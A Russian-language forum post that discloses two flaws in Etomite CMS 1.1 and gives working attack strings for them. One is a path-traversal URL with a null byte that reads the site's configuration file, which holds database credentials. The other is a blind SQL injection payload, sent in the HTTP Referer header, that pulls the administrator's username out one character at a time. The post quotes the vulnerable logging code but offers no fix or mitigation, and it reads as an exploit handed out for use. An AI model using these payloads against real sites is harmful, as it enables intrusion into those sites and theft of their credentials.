
23.05.2009, 08:49
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме: 3152874
Репутация:
1020
|
|
Etomite CMS Blind Sql injection, чтения локальных файлов
Производитель:http://www.etomite.org/
Продукт:Etomite CMS
Версия:1.1
Чтения локальных файлов(постом или при registr_globals on гетом и magic_quotes_gpc off):
PHP код:
http://www.hsc.org/manager/actions/static/document_data.static.action.php?id=../../../../../includes/config.inc.php%00
Blind Sql injection
Иньекция в Referer, вернее в path(manager/includes/visitor_logging.inc.php(101)):
PHP код:
$referer = urldecode($_SERVER['HTTP_REFERER']);
if(empty($referer)) {
$referer = "Unknown";
} else {
$pieces = parse_url($referer);
$referer = $pieces['scheme']."://".$pieces['host'].$pieces['path'];
}
...........................
$sql = "REPLACE INTO $tbl(id, data) VALUES('".$ref."', '".$referer."')";//206
пример реферера для blind:
PHP код:
http://asdasdasdads.com/%27 or 1=IF(ASCII(SUBSTRING((SELECT username FROM etomite.etomite_manager_users where id = 1),1,1))>96,0,(select 1 union select 5)))--+
необходимо знать префикс и имя базы данных(без нее выпадаем в ошибку)
|
|
|